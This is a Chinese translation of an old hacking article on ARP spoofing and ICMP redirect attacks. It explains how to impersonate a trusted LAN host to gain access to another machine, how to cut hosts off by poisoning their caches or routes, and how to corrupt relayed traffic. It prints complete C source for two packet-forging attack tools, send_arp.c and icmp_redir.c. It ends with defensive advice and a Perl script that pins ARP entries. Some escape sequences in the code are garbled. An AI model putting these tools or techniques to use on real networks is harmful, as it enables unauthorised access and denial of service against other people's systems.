ARP & ICMP欺騙
對於旁觀者來說,事物的缺點和優點往往是同時存在的。我很高興可以向你們顯示兩
個正規的協議——arp和icmp,當你用一些特殊的方法使用它們的時候,卻得到意想不到的結果。
相對於被動攻擊(網絡監聽sniffing)來說,主動攻擊使用的並不普遍——許多管理
員都擁有一個網絡監聽工具,幫助他們管理局域網。在你的LAN中,主動攻擊將會給你的生活添加光彩和樂趣。你知道,僅僅是一些技術細節使得這些角落有些昏暗不明。那麼,我們去看看那裏究竟有些是什麼。
我們首先描述一下網絡欺騙(spoofing)和拒絕服務(DoS-deny of service)。象IP
盲攻擊一樣,網絡攻擊常常非常普通並且功能強大,但是對使用者來說,需要做大量的工作(常常是猜),而且難於實行。但是ARP欺騙正好相反,它非常容易使用且方便。
一、ARP欺騙
ARP欺騙往往應用於一個內部網絡,我們可以用它來擴大一個已經存在的網絡安全漏洞。
如果你可以入侵一個子網內的機器,其它的機器安全也將受到ARP欺騙的威脅。
讓我們考慮一下的網絡結構
IP 10.0.0.1 10.0.0.2 10.0.0.3 10.0.0.4
hostname cat rat dog bat
hw addr AA:AA BB:BB CC:CC DD:DD
所有的主機在以太網中以簡單的方式進行連接(沒有交換機,智能HUB)。你是cat,你
具有root權限,你的目標是侵入dog。而你知道dog信任rat,所以如果你能僞裝成rat,那麼你就能獲得一些意外的東西。
也許你首先想到的是,“爲什麼我不把我的IP設成rat的,然後...”,這種方式無法工
作,無法可靠的工作。如果你將cat的IP設置成10.0.0.2,那麼cat將以這個IP回答ARP請求。但是rat也會的。這樣你們就進入了一個純粹的競爭狀態,而這場比賽沒有贏家。相反的,你會輕易的輸掉這場比賽,因爲許多工具會立即發現這種IP衝突的現象,抱怨之聲隨之而來。一些網絡交通分析工具還常常對它進行紀錄。在網絡管理員的日誌文件中還會保留一條噁心的紀錄(cat的物理地址),這可不是你想要的。你的不到你想要的東西,並且與你的目標背道而馳。
這個東西是你想要的,一個攻擊程序——send_arp.c,一個非常有效的工具。正如它的
名字所示,它發送一個ARP包(ARP回答,準確的說:由於這個協議是無狀態的,即使在沒有請求的時候也可以做出應答。請求同應答是一樣的。)向網絡上,你可以把這個包做成你想要的樣子。
而你想要的只不過是可以去定製源IP與目的IP,還有硬件地址。
當你進行ARP欺騙的時候,你不希望你的網卡亂說話,那麼你可以用“ifconfig eth0 -arp”關掉你的ARP協議。當然,無論如何你都需要ARP的信息,手動的構建它並使它發向內核。重要的事你要獲得你周圍人們的信任。在這個例子中,你希望dog認爲rat的硬件地址是AA:AA(cat),所以你發送一個ARP應答,它的源地址是10.0.0.2,源硬件地址是AA:AA,目標地址是10.0.0.3和目標硬件地址是CC:CC。現在,dog完全相信rat的硬件地址是AA:AA。當然dog中緩存會過期,所以它需要更新(重新發送請求)。多長時間發出請求,各個操作系統不同,但是大多來說是40秒鐘左右。經常發送ARP應答,這對你來說不會有壞處的。
對於ARP緩存處理方法的不同會帶來問題的複雜性。一些操作系統(例如Linux)會用向
緩存地址發非廣播的ARP請求來要求更新緩存(就象你妻子打電話來看你在不在一樣)。這種緩存更新會給你增加麻煩,會使你剛剛僞造的ARP緩存被更改掉,所以必須避免此事發生。經常的向dog發出應答數據,這樣它就不會發出請求。正是預防爲主。對於rat來說,它根本就沒有機會來改變這一切。
所以過程是簡單的。首先來設置網絡接口別名(ifconfig eth0:1 10.0.0.2),添加rat
的IP地址並且打開ARP協議(ifconfig eth0 arp)——你需要設置你的ARP緩存,當沒有ARP時,它不會工作。然後在正確的網絡接口上設置到dog的路由。再設置dog的ARP緩存。最後,關掉網絡接口的ARP功能。這樣一切就OK了。
現在,當你用send_arp將毒液注入之後(dog和rat),那麼,dog就會認爲,你就是rat。
一定要記住,要持續不斷的向dog和rat發出ARP包。
這種攻擊方式就僅僅工作在局域網內(通常的,ARP包是不會路由的)。一個有趣的嘗試
是,把我們上述試驗中dog替換成路由器,如果可以實現的話(我不確定它是否會永遠成立,路由器的ARP功能不是那麼容易欺騙的),你可以輕易的冒充這個局域網內的機器去欺騙這個Internet世界了。所以目標可以是任何一臺機器,但是你要僞裝的機器,必須是這個局域網內的。
除了欺騙以外,你還可以用ARP作很多事。藍天之下,皆可任你遨遊。或者,DoS也是一個
非常有用的程序。
給rat一個錯誤的硬件地址,是一個非常有效的讓它閉嘴的方法。你可以避免它向一些特
殊的機器發出請求(一個ARP緩衝池通常可以容括整個網絡的內容,所以你可以在一段時間內有效的防止它向其它機器發出請求)。非常明顯目標也可以是一臺路由器。干擾緩存需要兩步:攪亂被僞裝的機器和你不希望它與之通訊的機器。這種方法不是常常奏效,當這臺機器發現緩存中沒有目標機器時,會主動發出ARP請求。當然你的下一滴毒液會迅速注入,但是你需要經常維持這種狀態。
一個比較有效的方法是,給rat一個錯誤的dog硬件地址,這樣rat既能保持正常的工作狀態,又不會干擾你的活動。同樣的,這種方法也依賴於不同的環境,通常的情況是rat會經常的向錯誤的目標發出各種不同的包,目標會返回ICMP不可抵達信息,從而用一種不正當的方式維持了連接。這種僞裝的連接可以推遲緩存的更新時間。在Linux上,我們可以是更新時間從1分鐘提升到10分鐘。在這一段時間內,你已經可以完成一個TCP連接可以完成的大多數事情了。
這裏存在一個有趣被稱爲“無理ARP”。在這個ARP請求包中,源IP與目的IP是相同的,通
常它是經過以太網廣播進行發送。一些執行程序認爲這是一種特殊情況——系統發出的自身更新信息,並且將這個請求添加在自己的緩存中。這種方式裏,影響的是整個網絡。這是毋庸置疑的,但這並不是ARP協議的一部分,而是由執行者決定是否作(或是不作),這漸漸的變得不受人歡迎。
ARP也可以用來開一些非常專業的笑話。假想一下某人設置了一箇中繼器或者是一個管道,
僅僅是利用自己的機器去騙取兩臺相鄰機器的信任,並且把通訊的包都發給這臺機器。如果這臺機器僅僅是轉發數據,那麼誰也不會發現。但是當它僅僅作一些很少的改動時,就會給你添加非常大的麻煩。例如,隨機的更改數據包中的幾位,這樣就會造成校驗和錯誤。數據流好像是毫髮無損,卻會毫無原因的出現不可預料的錯誤。
二、ICMP重定向
另外一個比較有效的並且類似與ARP欺騙的手段是利用另外一個正常的協議——ICMP重
定向。這種重定向通常是由你的默認路由器發來的,通告你有一個到達某一網絡的更近的路由。
最初,既可以通告網絡重定向,也可以通告主機的重定向,但是現在,由於網絡重定向被否決,僅剩下了主機重定向。正確的製作一個經過完整檢查的ICMP包(必須由默認路由器發來,發向重定向機器,新的路由應該是一個網絡的直接連接等等),接收者會對系統的路由表進行更新。
這是ICMP的安全問題。僞裝一個路由器的IP地址是簡單的,icmp_redir.c正是作的這個
工作。RFC聲明系統必須遵循這個重定向,除非你是路由器。實際上幾乎所有的系統都支持這一點(除了vanilla Linux 2.0.30)。
ICMP重定向提供了一個非常有力的DoS工具。不像ARP緩存更新,路由表不存在的過期問
題。並且不需要在本地網絡,你可以發起攻擊從任何地方。所以當目標接受了ICMP重定向之後(包確切抵達),目標就不會再和網絡上的一些機器進行通訊(是的,並不是所有的機器,但是一些與目標機器不在同一個網絡上的機器)。域名服務器會是一個非常好的攻擊目標。
/* send_arp.c
這個程序發送ARP包,由使用者提供源/目的IP和網卡地址。編譯並運行在Linux環境下,
也可以運行在其它的有SOCK_PACKET的Unix系統上。
這個程序是對上述理論的驗證,僅此而已。
*/
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define DEFAULT_DEVICE "eth0"
char usage[]={"send_arp: sends out custom ARP packet./n
/tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr/n/n"};
struct arp_packet {
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};
void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);
int main(int argc,char** argv){
struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;
if(argc != 5)die(usage);
sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
perror("socket");
exit(1);
}
pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);
get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);
get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);
memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);
bzero(pkt.padding,18);
strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}
void die(char* str){
fprintf(stderr,"%s/n",str);
exit(1);
}
void get_ip_addr(struct in_addr* in_addr,char* str){
struct hostent *hostp;
in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
if( (hostp = gethostbyname(str)))
bcopy(hostp->h_addr,in_addr,hostp->h_length);
else {
fprintf(stderr,"send_arp: unknown host %s/n",str);
exit(1);
}
}
}
void get_hw_addr(char* buf,char* str){
int i;
char c,val;
for(i=0;i<ETH_HW_ADDR_LEN;i++){
if( !(c = tolower(*str++))) die("Invalid hardware address");
if(isdigit(c)) val = c-'0';
else if(c >= 'a' && c <= 'f') val = c-'a'+10;
else die("Invalid hardware address");
*buf = val << 4;
if( !(c = tolower(*str++))) die("Invalid hardware address");
if(isdigit(c)) val = c-'0';
else if(c >= 'a' && c <= 'f') val = c-'a'+10;
else die("Invalid hardware address");
*buf++ |= val;
if(*str == ':')str++;
}
}
/* icmp_redir.c
本程序由用戶提供的網關地址發送了一個ICMP主機重定向數據包。在Linux2.0.30上測試通過,並且對大多數的Unix機器有效。
這個程序是對上述理論的驗證,僅此而已。
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <syslog.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip.h>
#define IPVERSION 4
struct raw_pkt {
struct iphdr ip; /* This is Linux-style iphdr.
Use BSD-style struct ip if you want */
struct icmphdr icmp;
struct iphdr encl_iphdr;
char encl_ip_data[8];
};
struct raw_pkt* pkt;
void die(char *);
unsigned long int get_ip_addr(char*);
unsigned short checksum(unsigned short*,char);
int main(int argc,char** argv){
struct sockaddr_in sa;
int sock,packet_len;
char usage[]={"icmp_redir: send out custom ICMP host redirect packet.
yuri volobuev'97/n
/tusage: icmp_redir gw_host targ_host dst_host dummy_host/n"};
char on = 1;
if(argc != 5)die(usage);
if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
perror("socket");
exit(1);
}
sa.sin_addr.s_addr = get_ip_addr(argv[2]);
sa.sin_family = AF_INET;
packet_len = sizeof(struct raw_pkt);
pkt = calloc((size_t)1,(size_t)packet_len);
pkt->ip.version = IPVERSION;
pkt->ip.ihl = sizeof(struct iphdr) >> 2;
pkt->ip.tos = 0;
pkt->ip.tot_len = htons(packet_len);
pkt->ip.id = htons(getpid() & 0xFFFF);
pkt->ip.frag_off = 0;
pkt->ip.ttl = 0x40;
pkt->ip.protocol = IPPROTO_ICMP;
pkt->ip.check = 0;
pkt->ip.saddr = get_ip_addr(argv[1]);
pkt->ip.daddr = sa.sin_addr.s_addr;
pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr));
pkt->icmp.type = ICMP_REDIRECT;
pkt->icmp.code = ICMP_REDIR_HOST;
pkt->icmp.checksum = 0;
pkt->icmp.un.gateway = get_ip_addr(argv[4]);
memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr));
pkt->encl_iphdr.protocol = IPPROTO_IP;
pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);
pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);
pkt->encl_iphdr.check = 0;
pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr),
sizeof(struct iphdr));
pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp),
sizeof(struct raw_pkt)-sizeof(struct iphdr));
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
perror("setsockopt: IP_HDRINCL");
exit(1);
}
if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}
void die(char* str){
fprintf(stderr,"%s/n",str);
exit(1);
}
unsigned long int get_ip_addr(char* str){
struct hostent *hostp;
unsigned long int addr;
if( (addr = inet_addr(str)) == -1){
if( (hostp = gethostbyname(str)))
return *(unsigned long int*)(hostp->h_addr);
else {
fprintf(stderr,"unknown host %s/n",str);
exit(1);
}
}
return addr;
}
unsigned short checksum(unsigned short* addr,char len){
register long sum = 0;
while(len > 1){
sum += *addr++;
len -= 2;
}
if(len > 0) sum += *addr;
while (sum>>16) sum = (sum & 0xffff) + (sum >> 16);
return ~sum;
}
三、解決方案
對於大多數人來說,ARP是一個隱藏的底層協議。你可以時不時的觀察它,但是平常不
會有人對它發生興趣。你可以用arp命令來檢查你的ARP緩存,但是當一個網絡出現問題的時候,這個並不是我們首先想到的。Windows也存在這個命令,記住這一點也許對你有幫助。但是當一個ARP欺騙通過網關從另一個網絡發向你時,恐怕你也無能爲力了。同樣的,你也可以在你的路由表中發現重定向的路由信息(route 命令,用“D”標誌來標明)。
ARP攻擊設計來攻擊10Base2以太網。如果網絡已一些比較先進的方式進行連接,通常是
智能HUB或交換機,那麼攻擊就很容易被發現,甚至是不可能的(類似於被動攻擊)。所以這是一個向你的老闆要求更新網絡設備的理由。
這麼想起來,ICMP重定向真是一個非常瘋狂的想法。首先,一些網絡的結構非常簡單,
對路由表不需要任何添加;其次,大多數的穩定的網絡上,僅僅是用手動的辦法來更新路由。這並不是一個經常更新的工作,爲什麼要通過ICMP呢?最後,這個對於你來說是非常危險的,你可以在你的系統上關閉ICMP重定向,這樣可以減少同RFC1122的衝突。哎,這可不容易呀!在Linux這種提供源碼的機器上,你可以重新編譯內核。在Irix 6.2和一些其它的系統上,可以“set icmp_dropredirects=1”。這與其它的OS,我也不知道有什麼辦法。
時間證明了這個真理:不要信任未確認的主機。否則,網絡上帝不會對你施予憐憫的。
一些人認爲“我有防火牆,我怕誰”,認爲一些安全問題對它來說無關緊要。我承認防
火牆的作用,但是這並不是經常有效。
想象這樣一個環境,所有的機器都直接與Internet相連,你不得不與你不瞭解的人共用
你的內部網,他們使用的是vanilla SGI 的機器,而他們簡直是在到處告訴別人“來攻擊我吧,我的買主使它非常簡單”(是這樣的,那些人認識Unix,從侏羅紀公園...),另外,通向你的路由器由別的機構控制。讓我們來到一個標準的網絡環境,它會提供我們安全,不受外部的攻擊。
人們在這裏工作,使用電腦。同樣,這裏的每臺機器也存在安全問題。所以,當你下一次提到防火牆的時候,請記住它並不能保護每一個人。
John Goerzen提供了一個Perl腳本,可以在系統啓動時運行。它主要是在Linux機器中
維持一個已知的IP地址與硬件地址的緩存,設置標誌,以使其不會被更新和改變。配置文件非常簡單——IP addr 配 MAC addr,用空格鍵分割,“#”作爲註釋。
這個腳本僅僅在Linux機器上測試過——在其它平臺上的人需要修改arp命令的格式。
注意:腳本需要運行在網絡接口啓動之後,服務和客戶運行之前;另外,一些人會在
ARP被鎖定時竊取連接。以下是它的腳本:
#!/usr/bin/perl
# Program: forcehwaddr
# Program to run ARP to force certain tables.
# Specify filenames to read from on command line, or read from stdin.
foreach (<>) { # For each input line....
chomp; # Strip if CR/LF
if (/^#/) { next; } # If it's a comment, skip it.
if (((($host, $hw) = //s*(.+?)/s+(/S+)/s*/) == 2) &&
!(/^#/)) {
# The text between the slashes parses the input line as follows:
# Ignore leading whitespace. (/s*)
# Then, start matching and put it into $host ($host, (.+?))
# Skip over the whitespace after that (/s+)
# Start matching. Continue matching until end of line or optional
# trailing whitespace.
# Then, the if checks to see that both a
# host and a hardware address were matched.
# (2 matches). If not, we skip the
# line (assuming it is blank or invalid or something).
# The second part of the if checks to see if the line starts with
# a pound sign; if so, ignore it (as a comment).
# Otherwise, run the appropriate command:
printf("Setting IP %-15s to hardware address %s/n", $host, $hw);
system "/usr/sbin/arp -s $host $hw/n";
}
}
